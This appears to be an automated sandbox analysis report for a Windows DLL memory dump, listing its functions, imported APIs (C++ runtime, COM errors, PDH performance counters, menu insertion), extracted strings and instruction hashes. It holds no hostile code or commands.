APIs

__EH_prolog3.LIBCMT ref: 6E7E5D5F
std::_Lockit::_Lockit.LIBCPMT ref: 6E7E5D69

Part of subcall function 6E7D1800: std::_Lockit::_Lockit.LIBCPMT ref: 6E7D181D
Part of subcall function 6E7D1800: std::_Lockit::~_Lockit.LIBCPMT ref: 6E7D1839

codecvt.LIBCPMT ref: 6E7E5DA3
std::_Facet_Register.LIBCPMT ref: 6E7E5DBA
std::_Lockit::~_Lockit.LIBCPMT ref: 6E7E5DDA
__CxxThrowException@8.LIBVCRUNTIME ref: 6E7E5DF8

Memory Dump Source

Source File: 00000002.00000002.998800576.000000006E7D1000.00000020.00020000.sdmp, Offset: 6E7D0000, based on PE: true

Associated: 00000002.00000002.998796126.000000006E7D0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.998846427.000000006E80A000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.998866776.000000006E81E000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.998889318.000000006E821000.00000002.00020000.sdmp Download File

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrowcodecvt
String ID:
API String ID: 2594415655-0
Opcode ID: 0866c571798f71f609fc86d5f4bd0b11cca70942c82561364481eb69321e978d
Instruction ID: 549471cadda8be96f6e458d77b7a2f0239f91c3805c5cb6193821be907d64276
Opcode Fuzzy Hash: 0866c571798f71f609fc86d5f4bd0b11cca70942c82561364481eb69321e978d
Instruction Fuzzy Hash: 1611087190011E8BCF05DFE4DA98AED77BCAF84364F240918E5157B6A0CF789A09CB90

Uniqueness

Uniqueness Score: -1.00%

Function 6E7D87F0, Relevance: 9.0, APIs: 6, Instructions: 44COMMON

Download Yara Rule

APIs

_com_issue_error.COMSUPP ref: 6E7D8B93
_com_issue_error.COMSUPP ref: 6E7D8B9D
_com_issue_error.COMSUPP ref: 6E7D8BA7
_com_issue_error.COMSUPP ref: 6E7D8BAD
_com_issue_error.COMSUPP ref: 6E7D8BB7
_com_issue_error.COMSUPP ref: 6E7D8BC1

Memory Dump Source

Source File: 00000002.00000002.998800576.000000006E7D1000.00000020.00020000.sdmp, Offset: 6E7D0000, based on PE: true

Associated: 00000002.00000002.998796126.000000006E7D0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.998846427.000000006E80A000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.998866776.000000006E81E000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.998889318.000000006E821000.00000002.00020000.sdmp Download File

Similarity

API ID: _com_issue_error
String ID:
API String ID: 2162355165-0
Opcode ID: c9fb990436456b6c648c3582f9b1e0622ef57a783e82480b75838650af35106f
Instruction ID: 5e0c8668a0fa95112c784d6b95f71e8c9538d104fc3e372c80f9c84be5c41b9f
Opcode Fuzzy Hash: c9fb990436456b6c648c3582f9b1e0622ef57a783e82480b75838650af35106f
Instruction Fuzzy Hash: 5DF030F140054DEEFB01DFE5CE18FAEB6ACEB04614F10091CEA14BAA95C7346506C6A9

Uniqueness

Uniqueness Score: -1.00%

Function 6E7E09C0, Relevance: 9.0, APIs: 3, Strings: 2, Instructions: 274COMMON

Download Yara Rule

APIs

Part of subcall function 6E7DB2A0: SHGetFolderPathW.SHELL32(00000000,0000001A,00000000,00000000,?,77DCEE0D,00000000,?), ref: 6E7DB30E

ShellExecuteW.SHELL32(00000000,edit,?,00000000,00000000,00000001), ref: 6E7E0A17
PdhRemoveCounter.PDH(?,?,00000000), ref: 6E7E0AB3
PdhCloseQuery.PDH(?,?,00000000), ref: 6E7E0AC8

Strings

0, xrefs: 6E7E0B77
edit, xrefs: 6E7E0A10

Memory Dump Source

Source File: 00000002.00000002.998800576.000000006E7D1000.00000020.00020000.sdmp, Offset: 6E7D0000, based on PE: true

Associated: 00000002.00000002.998796126.000000006E7D0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.998846427.000000006E80A000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.998866776.000000006E81E000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.998889318.000000006E821000.00000002.00020000.sdmp Download File

Similarity

API ID: CloseCounterExecuteFolderPathQueryRemoveShell
String ID: 0$edit
API String ID: 2809573910-562573004
Opcode ID: 7384e55e19d070d0ab48edf9064494b5485d2eb4e831fe8ea8c461a7a1789678
Instruction ID: cfb309e12e599698069c9ac5d8004697b00c2ca01a59ec83b0b2268755b6ffd2
Opcode Fuzzy Hash: 7384e55e19d070d0ab48edf9064494b5485d2eb4e831fe8ea8c461a7a1789678
Instruction Fuzzy Hash: C7A138716003068FD304CF68CA95B9AB7A5FF85318F104A1CE9559BAB1EB32F985CBD1

Uniqueness

Uniqueness Score: -1.00%

Function 6E7FC6E1, Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 199COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 6E7FC869

Strings

., xrefs: 6E7FCA72
*?, xrefs: 6E7FC722

Memory Dump Source

Source File: 00000002.00000002.998800576.000000006E7D1000.00000020.00020000.sdmp, Offset: 6E7D0000, based on PE: true

Associated: 00000002.00000002.998796126.000000006E7D0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.998846427.000000006E80A000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.998866776.000000006E81E000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.998889318.000000006E821000.00000002.00020000.sdmp Download File

Similarity

API ID: _free
String ID: *?$.
API String ID: 269201875-3972193922
Opcode ID: 56b8108a8e6e81758a6e44a9f0b24d166001932c6213a47b12974f263f32d42e
Instruction ID: 8af81aa8e05b4cf1787d4e594bc1fcbc12470249fbd259435f94171d7958af8b
Opcode Fuzzy Hash: 56b8108a8e6e81758a6e44a9f0b24d166001932c6213a47b12974f263f32d42e
Instruction Fuzzy Hash: B3613A76D04119DFDB04CFE8C9804EDFBF9EF48314B25456AD855AB314E731AE428BA4

Uniqueness

Uniqueness Score: -1.00%

Function 6E7D1F70, Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 145COMMON

Download Yara Rule

APIs

__CxxThrowException@8.LIBVCRUNTIME ref: 6E7D206D

Part of subcall function 6E7E8B67: RaiseException.KERNEL32(?,?,6E7E5B36,000000FF,00000000,00000000,24448D6E,?,?,?,?,6E7E5B36,000000FF,6E81BC44,?,000000FF), ref: 6E7E8BC7

__CxxThrowException@8.LIBVCRUNTIME ref: 6E7D20B2
___std_exception_copy.LIBVCRUNTIME ref: 6E7D20DF

Strings

ios_base::badbit set, xrefs: 6E7D2077, 6E7D20A2, 6E7D20C3
ios_base::failbit set, xrefs: 6E7D1F85

Memory Dump Source

Source File: 00000002.00000002.998800576.000000006E7D1000.00000020.00020000.sdmp, Offset: 6E7D0000, based on PE: true

Associated: 00000002.00000002.998796126.000000006E7D0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.998846427.000000006E80A000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.998866776.000000006E81E000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.998889318.000000006E821000.00000002.00020000.sdmp Download File

Similarity

API ID: Exception@8Throw$ExceptionRaise___std_exception_copy
String ID: ios_base::badbit set$ios_base::failbit set
API String ID: 3941765731-1240500531
Opcode ID: e6f888e6c72ecc70d7556f060a790e3e13b606006faa56e4a5b824e368906bbc
Instruction ID: fc5d9fdfb0a78003a83d1d13104e8ec51e7a2deb1764b44915492f69aef9effe
Opcode Fuzzy Hash: e6f888e6c72ecc70d7556f060a790e3e13b606006faa56e4a5b824e368906bbc
Instruction Fuzzy Hash: 9E41B3B1A04209AFD704CFE8DD44BDEB7BCEF45310F148A2AE554D7650E771A949CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 6E7D1600, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 67COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 6E7D162D
std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 6E7D167C

Part of subcall function 6E7E579A: _Yarn.LIBCPMT ref: 6E7E57B9
Part of subcall function 6E7E579A: _Yarn.LIBCPMT ref: 6E7E57DD

__CxxThrowException@8.LIBVCRUNTIME ref: 6E7D16AE

Strings

$J}n, xrefs: 6E7D166F, 6E7D167A
bad locale name, xrefs: 6E7D1698

Memory Dump Source

Source File: 00000002.00000002.998800576.000000006E7D1000.00000020.00020000.sdmp, Offset: 6E7D0000, based on PE: true

Associated: 00000002.00000002.998796126.000000006E7D0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.998846427.000000006E80A000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.998866776.000000006E81E000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.998889318.000000006E821000.00000002.00020000.sdmp Download File

Similarity

API ID: Yarnstd::_$Exception@8Locinfo::_Locinfo_ctorLockitLockit::_Throw
String ID: $J}n$bad locale name
API String ID: 3628047217-616600959
Opcode ID: f84fd8fd7557b714f8a0782cb53bf610308146d9b8e56e0649cf7ce73d167410
Instruction ID: 3ce9e711ab215b6664ed244d153c5cc304ebf147ab037c5b721ada84f5988d3e
Opcode Fuzzy Hash: f84fd8fd7557b714f8a0782cb53bf610308146d9b8e56e0649cf7ce73d167410
Instruction Fuzzy Hash: 54118E719047489FD720CFA8C904B9BBBF8EB19314F008A5EE45AD7B81E775A608CB95

Uniqueness

Uniqueness Score: -1.00%

Function 6E7E1230, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 39windowCOMMON

Download Yara Rule

APIs

InsertMenuW.USER32(?,?,00000C00,?,00000000), ref: 6E7E125A
InsertMenuW.USER32(?,?,00000400,?,Performance Monitor - (Reload Configuration)), ref: 6E7E126E
InsertMenuW.USER32(?,?,00000400,?,Performance Monitor - (Edit Configuration)), ref: 6E7E1282

Strings

Performance Monitor - (Edit Configuration), xrefs: 6E7E1270
Performance Monitor - (Reload Configuration), xrefs: 6E7E125C

Memory Dump Source

Source File: 00000002.00000002.998800576.000000006E7D1000.00000020.00020000.sdmp, Offset: 6E7D0000, based on PE: true

Associated: 00000002.00000002.998796126.000000006E7D0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.998846427.000000006E80A000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.998866776.000000006E81E000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.998889318.000000006E821000.00000002.00020000.sdmp Download File

Similarity

API ID: InsertMenu
String ID: Performance Monitor - (Edit Configuration)$Performance Monitor - (Reload Configuration)
API String ID: 1478380399-4081388356
Opcode ID: 43ddef41c940742e5f8b7698f967502a4a7c6cdeb8b85ade5737166a5eefaa3a
Instruction ID: 6b49968ec2e17a6dfb08186ee233ccc8f62cceefbf57d99b759f08287474f782
Opcode Fuzzy Hash: 43ddef41c940742e5f8b7698f967502a4a7c6cdeb8b85ade5737166a5eefaa3a
Instruction Fuzzy Hash: D9F0B43314024D7BEB01DE849C80FBB7B6CEB49710F044416FB049A181C371A921DBB4

Uniqueness

Uniqueness Score: -1.00%

Function 6E7F6100, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,6E7F60B1,6E7F6079), ref: 6E7F6120
GetProcAddress.KERNEL32(00000000,CorExitProcess,00000000,?,?,?,6E7F60B1,6E7F6079), ref: 6E7F6133
FreeLibrary.KERNEL32(00000000,?,?,?,6E7F60B1,6E7F6079), ref: 6E7F6156

Strings

CorExitProcess, xrefs: 6E7F612B
mscoree.dll, xrefs: 6E7F6119

Memory Dump Source

Source File: 00000002.00000002.998800576.000000006E7D1000.00000020.00020000.sdmp, Offset: 6E7D0000, based on PE: true

Associated: 00000002.00000002.998796126.000000006E7D0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.998846427.000000006E80A000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.998866776.000000006E81E000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.998889318.000000006E821000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: 43956fec855156fe6e91d2340933703833a00c8fab575d94cfecfcce088cc9e3
Instruction ID: b15d134d6de2187c1c5cc422ee1e261b4134192e5506363a7213ab87c4b37170
Opcode Fuzzy Hash: 43956fec855156fe6e91d2340933703833a00c8fab575d94cfecfcce088cc9e3
Instruction Fuzzy Hash: 49F04F31A1061DFBDF019FD0CC18B9EBFB8EF0A251F0000A8E809A6251DB358A42CBD0

Uniqueness

Uniqueness Score: -1.00%

Function 6E7FE402, Relevance: 7.7, APIs: 5, Instructions: 222COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.998800576.000000006E7D1000.00000020.00020000.sdmp, Offset: 6E7D0000, based on PE: true

Associated: 00000002.00000002.998796126.000000006E7D0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.998846427.000000006E80A000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.998866776.000000006E81E000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.998889318.000000006E821000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9112cfc7d0c89c99eba1f2f0461d9b77ede78e4df89fd6dcdd0e536ba260c04c
Instruction ID: 6698e2e82f8ad36e0bcf43e32a326e2cf4eca912202a205b889468522960bd41
Opcode Fuzzy Hash: 9112cfc7d0c89c99eba1f2f0461d9b77ede78e4df89fd6dcdd0e536ba260c04c
Instruction Fuzzy Hash: 6D719B7190021EDBDB618ED9CA84AAABB75EF42330F100679E421973A4DB70D943DBA1

Uniqueness

Uniqueness Score: -1.00%

Function 6E7FB083, Relevance: 7.7, APIs: 5, Instructions: 187COMMON

Download Yara Rule

APIs

Part of subcall function 6E7F92A2: RtlAllocateHeap.NTDLL(00000000,00000103,000000FF,?,6E7E865C,00000105,000000FF,24448D6E,00000000,?,6E7D14D7,?,00000103,000000FF), ref: 6E7F92D4

_free.LIBCMT ref: 6E7FB18E
_free.LIBCMT ref: 6E7FB1A5
_free.LIBCMT ref: 6E7FB1C4
_free.LIBCMT ref: 6E7FB1DF
_free.LIBCMT ref: 6E7FB1F6

Memory Dump Source

Source File: 00000002.00000002.998800576.000000006E7D1000.00000020.00020000.sdmp, Offset: 6E7D0000, based on PE: true

Associated: 00000002.00000002.998796126.000000006E7D0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.998846427.000000006E80A000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.998866776.000000006E81E000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.998889318.000000006E821000.00000002.00020000.sdmp Download File

Similarity

API ID: _free$AllocateHeap
String ID:
API String ID: 3033488037-0
Opcode ID: b2b08902d3493ef94de68150e36606e37d1e71bf2b5d53b4aca48f354101e2f5
Instruction ID: ade9eec2a3f1a5934ef1650d8e5cb4e34bbca9e023bc62c1343f56cbfed187a0
Opcode Fuzzy Hash: b2b08902d3493ef94de68150e36606e37d1e71bf2b5d53b4aca48f354101e2f5
Instruction Fuzzy Hash: B351C271A04605EFDB15CFA9CE40AAA77F8EF59724B104A6DE809DB764E731E902CB40

Uniqueness

Uniqueness Score: -1.00%

Function 6E7E3920, Relevance: 7.7, APIs: 5, Instructions: 159COMMON

Download Yara Rule

APIs

PdhRemoveCounter.PDH(?,77DCEE0D,?,?,00000000,6E80956B,000000FF,?,6E7E0C1F,00000000), ref: 6E7E3973
PdhCloseQuery.PDH(?,77DCEE0D,?,?,00000000,6E80956B,000000FF,?,6E7E0C1F,00000000), ref: 6E7E399E
PdhOpenQueryW.PDH(00000000,00000000,?), ref: 6E7E39C2
PdhValidatePathW.PDH(?), ref: 6E7E3A1E
PdhAddCounterW.PDH(?,?,00000000,?), ref: 6E7E3A4A

Memory Dump Source

Source File: 00000002.00000002.998800576.000000006E7D1000.00000020.00020000.sdmp, Offset: 6E7D0000, based on PE: true

Associated: 00000002.00000002.998796126.000000006E7D0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.998846427.000000006E80A000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.998866776.000000006E81E000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.998889318.000000006E821000.00000002.00020000.sdmp Download File

Similarity

API ID: CounterQuery$CloseOpenPathRemoveValidate
String ID:
API String ID: 698537007-0
Opcode ID: 94b7266c64984fb638afda9e0d5b5909c7b1fd5460bf1d8f0eb8b2daec62ae82
Instruction ID: f7b08652618b52a75ace3809fd966f0501d90a531251100d38af96aa632ccf02
Opcode Fuzzy Hash: 94b7266c64984fb638afda9e0d5b5909c7b1fd5460bf1d8f0eb8b2daec62ae82
Instruction Fuzzy Hash: 5C51D171900259AFDB20CF54CE48BDAB7B8FF44314F0085AAE45DAB660D775AAC5CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 6E7F67CB, Relevance: 7.6, APIs: 5, Instructions: 129COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 6E7F683D
_free.LIBCMT ref: 6E7F685D

Memory Dump Source

Source File: 00000002.00000002.998800576.000000006E7D1000.00000020.00020000.sdmp, Offset: 6E7D0000, based on PE: true

Associated: 00000002.00000002.998796126.000000006E7D0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.998846427.000000006E80A000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.998866776.000000006E81E000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.998889318.000000006E821000.00000002.00020000.sdmp Download File

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: e2933f2667e9b52da824f237385479dbe9792b0507c03ccd82a6c55b07dfac7f
Instruction ID: 5ba3a942f6ffcce162349a9b8933f6367e96abcf941c48bf4efd0f6eff8993b3
Opcode Fuzzy Hash: e2933f2667e9b52da824f237385479dbe9792b0507c03ccd82a6c55b07dfac7f
Instruction Fuzzy Hash: AF41D132A10204DFDB14DFF8C984A99B7BAEF89314B15456CE515EB361D731AA02CBC1

Uniqueness

Uniqueness Score: -1.00%

Function 6E7D4A90, Relevance: 7.6, APIs: 5, Instructions: 124COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 6E7D4ACC
std::_Lockit::_Lockit.LIBCPMT ref: 6E7D4AEE
std::_Lockit::~_Lockit.LIBCPMT ref: 6E7D4B0E
std::_Facet_Register.LIBCPMT ref: 6E7D4BDF
std::_Lockit::~_Lockit.LIBCPMT ref: 6E7D4BFF

Memory Dump Source

Source File: 00000002.00000002.998800576.000000006E7D1000.00000020.00020000.sdmp, Offset: 6E7D0000, based on PE: true

Associated: 00000002.00000002.998796126.000000006E7D0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.998846427.000000006E80A000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.998866776.000000006E81E000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.998889318.000000006E821000.00000002.00020000.sdmp Download File

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_Register
String ID:
API String ID: 459529453-0
Opcode ID: 37b8e6abe3e2c873f93af568722d71276692baa3765a7f1f0f2141f63dc482ca
Instruction ID: b65739b4c99ce71bb88103a0d362aa4ceadae0f440254ccb57af40d44b98e17d
Opcode Fuzzy Hash: 37b8e6abe3e2c873f93af568722d71276692baa3765a7f1f0f2141f63dc482ca
Instruction Fuzzy Hash: 5951CE70904609CFCB50CFD8CA44B9EB7B8FF55718F10852DD809AB691EB74AA4ACBD0

Uniqueness

Uniqueness Score: -1.00%

Function 6E7D4930, Relevance: 7.6, APIs: 5, Instructions: 113COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 6E7D4966
std::_Lockit::_Lockit.LIBCPMT ref: 6E7D4986
std::_Lockit::~_Lockit.LIBCPMT ref: 6E7D49A6
std::_Facet_Register.LIBCPMT ref: 6E7D4A43
std::_Lockit::~_Lockit.LIBCPMT ref: 6E7D4A63

Memory Dump Source

Source File: 00000002.00000002.998800576.000000006E7D1000.00000020.00020000.sdmp, Offset: 6E7D0000, based on PE: true

Associated: 00000002.00000002.998796126.000000006E7D0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.998846427.000000006E80A000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.998866776.000000006E81E000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.998889318.000000006E821000.00000002.00020000.sdmp Download File

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_Register
String ID:
API String ID: 459529453-0
Opcode ID: 7f242bbe24488b647eebb9a3b2518ae14287e691ce06be46fa2407bd66ff5a73
Instruction ID: 52715ba024c20260bbe270a0b77c6e67810d7864282736db3cd42a9e996f7716
Opcode Fuzzy Hash: 7f242bbe24488b647eebb9a3b2518ae14287e691ce06be46fa2407bd66ff5a73
Instruction Fuzzy Hash: 8A41C171A046198FCB10CFD5C680BDEB7B4EB45714F14446DD80AAB661EB30AA0ACFD1

Uniqueness

Uniqueness Score: -1.00%

Function 6E7FE9FD, Relevance: 7.6, APIs: 5, Instructions: 110COMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(24448D6E,00000000,?,00000002,00000000,00000000,00000000,00000000,?,24448D6E,00000001,00000002,?,00000001,00000000,?), ref: 6E7FEA4A
__alloca_probe_16.LIBCMT ref: 6E7FEA82
MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 6E7FEAD3
GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 6E7FEAE5
__freea.LIBCMT ref: 6E7FEAEE

Part of subcall function 6E7F92A2: RtlAllocateHeap.NTDLL(00000000,00000103,000000FF,?,6E7E865C,00000105,000000FF,24448D6E,00000000,?,6E7D14D7,?,00000103,000000FF), ref: 6E7F92D4

Memory Dump Source

Source File: 00000002.00000002.998800576.000000006E7D1000.00000020.00020000.sdmp, Offset: 6E7D0000, based on PE: true

Associated: 00000002.00000002.998796126.000000006E7D0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.998846427.000000006E80A000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.998866776.000000006E81E000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.998889318.000000006E821000.00000002.00020000.sdmp Download File

Similarity

API ID: ByteCharMultiWide$AllocateHeapStringType__alloca_probe_16__freea
String ID:
API String ID: 313313983-0
Opcode ID: 98e75e3f3e9b142529fc7bd8241efd1e12ee3db6f9f1b921b19137033d6de594
Instruction ID: 8248b3859695d310ed68f17e26e99ad95c6ae67833b83648977150496bd089f8
Opcode Fuzzy Hash: 98e75e3f3e9b142529fc7bd8241efd1e12ee3db6f9f1b921b19137033d6de594
Instruction Fuzzy Hash: 1131AE72A0060AEBDF15CFA5CD54EEE3BA9FF41320B004168EC24D72A0E735D952CB90

Uniqueness

Uniqueness Score: -1.00%

Function 6E7FD3D6, Relevance: 7.6, APIs: 5, Instructions: 68COMMON

Download Yara Rule

APIs

GetEnvironmentStringsW.KERNEL32 ref: 6E7FD3DF
WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 6E7FD402

Part of subcall function 6E7F92A2: RtlAllocateHeap.NTDLL(00000000,00000103,000000FF,?,6E7E865C,00000105,000000FF,24448D6E,00000000,?,6E7D14D7,?,00000103,000000FF), ref: 6E7F92D4

WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 6E7FD428
_free.LIBCMT ref: 6E7FD43B
FreeEnvironmentStringsW.KERNEL32(00000000), ref: 6E7FD44A

Memory Dump Source

Source File: 00000002.00000002.998800576.000000006E7D1000.00000020.00020000.sdmp, Offset: 6E7D0000, based on PE: true

Associated: 00000002.00000002.998796126.000000006E7D0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.998846427.000000006E80A000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.998866776.000000006E81E000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.998889318.000000006E821000.00000002.00020000.sdmp Download File

Similarity

API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
String ID:
API String ID: 336800556-0
Opcode ID: cd7baa9e454471abbfa9a73ca524da860f4ea33b67449591349f8c4e62ee099c
Instruction ID: d8184dacf75fae41e89620059de9ec7be5051b1c9dc0570d4f7d8f0803d294be
Opcode Fuzzy Hash: cd7baa9e454471abbfa9a73ca524da860f4ea33b67449591349f8c4e62ee099c
Instruction Fuzzy Hash: AD01B572601615FF6B111EFA5D8CE7B3A6DDEC39A43100128FE04C2310DA619D0399B6

Uniqueness

Uniqueness Score: -1.00%

Function 6E804048, Relevance: 7.5, APIs: 5, Instructions: 40COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 6E804060

Part of subcall function 6E7F9268: HeapFree.KERNEL32(00000000,00000000,?,6E7F69EA,000000FF,000000FF), ref: 6E7F927E
Part of subcall function 6E7F9268: GetLastError.KERNEL32(6E7F6065,?,6E7F69EA,000000FF,000000FF), ref: 6E7F9290

_free.LIBCMT ref: 6E804072
_free.LIBCMT ref: 6E804084
_free.LIBCMT ref: 6E804096
_free.LIBCMT ref: 6E8040A8

Memory Dump Source

Source File: 00000002.00000002.998800576.000000006E7D1000.00000020.00020000.sdmp, Offset: 6E7D0000, based on PE: true

Associated: 00000002.00000002.998796126.000000006E7D0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.998846427.000000006E80A000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.998866776.000000006E81E000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.998889318.000000006E821000.00000002.00020000.sdmp Download File

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 654eb65a932cbb53aeda2ff42ed5305605065c4a0ba308d9fefaefc85e36a0b3
Instruction ID: 516336765ca86b1b797dacdb3f5d8f294766b30d71129dfb831ce8c95188db31
Opcode Fuzzy Hash: 654eb65a932cbb53aeda2ff42ed5305605065c4a0ba308d9fefaefc85e36a0b3
Instruction Fuzzy Hash: E7F04F31588609DB8AA4DEE4D985C9673DDBA617103A04D09F019E7E90C730FD81CAE0

Uniqueness

Uniqueness Score: -1.00%

Function 6E7E7E10, Relevance: 7.5, APIs: 5, Instructions: 26COMMON

Download Yara Rule

APIs

_com_issue_error.COMSUPP ref: 6E7E7E1C
GetLastError.KERNEL32(?,00000000,?,00000000,8007000E), ref: 6E7E7E21
_com_issue_error.COMSUPP ref: 6E7E7E34
GetLastError.KERNEL32(?,00000000,8007000E), ref: 6E7E7E42
_com_issue_error.COMSUPP ref: 6E7E7E55

Memory Dump Source

Source File: 00000002.00000002.998800576.000000006E7D1000.00000020.00020000.sdmp, Offset: 6E7D0000, based on PE: true

Associated: 00000002.00000002.998796126.000000006E7D0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.998846427.000000006E80A000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.998866776.000000006E81E000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.998889318.000000006E821000.00000002.00020000.sdmp Download File

Similarity

API ID: _com_issue_error$ErrorLast
String ID:
API String ID: 1321852664-0
Opcode ID: 59c09ce0b7be50ae86338f1ee21e7630e0ed9a715b29abede351bf7021fd51cd
Instruction ID: 16d748f4f3f829951381fe4a39736a64b39cc9f7ebbeca1323c122271e174bb3
Opcode Fuzzy Hash: 59c09ce0b7be50ae86338f1ee21e7630e0ed9a715b29abede351bf7021fd51cd
Instruction Fuzzy Hash: E0E08CB090069EA6C600AEF00A0CBAE225C5B02624B204E58E05CE49F1DB28C10B9AB9

Uniqueness

Uniqueness Score: -1.00%

Function 6E7F61A4, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 123COMMON

Download Yara Rule

Strings

C:\Windows\SysWOW64\rundll32.exe, xrefs: 6E7F61E7, 6E7F61EE, 6E7F6222

Memory Dump Source

Source File: 00000002.00000002.998800576.000000006E7D1000.00000020.00020000.sdmp, Offset: 6E7D0000, based on PE: true

Associated: 00000002.00000002.998796126.000000006E7D0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.998846427.000000006E80A000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.998866776.000000006E81E000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.998889318.000000006E821000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID: C:\Windows\SysWOW64\rundll32.exe
API String ID: 0-2837366778
Opcode ID: 81f2e22f343ea5071479ee6095a909c653363da9b203faa3b1221ec0be87c6d0
Instruction ID: 8cf9ee449ae3093cd00e5fef62fe7114b7841367ec9d53a65caa782cb975fb87
Opcode Fuzzy Hash: 81f2e22f343ea5071479ee6095a909c653363da9b203faa3b1221ec0be87c6d0
Instruction Fuzzy Hash: 09418471A14215EFDB11DFD9CA849DEBBBCEF8A310B1045A6E91497360EB708B42CBD0

Uniqueness

Uniqueness Score: -1.00%

Function 6E7F9C8B, Relevance: 6.3, APIs: 4, Instructions: 316COMMON

Download Yara Rule

APIs

_strrchr.LIBCMT ref: 6E7F9D12

Memory Dump Source

Source File: 00000002.00000002.998800576.000000006E7D1000.00000020.00020000.sdmp, Offset: 6E7D0000, based on PE: true

Associated: 00000002.00000002.998796126.000000006E7D0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.998846427.000000006E80A000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.998866776.000000006E81E000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.998889318.000000006E821000.00000002.00020000.sdmp Download File

Similarity

API ID: _strrchr
String ID:
API String ID: 3213747228-0
Opcode ID: 30daa00f9ed7ea23be0689d122243d6d7c7171fafba721b1ad2257128bfc374a
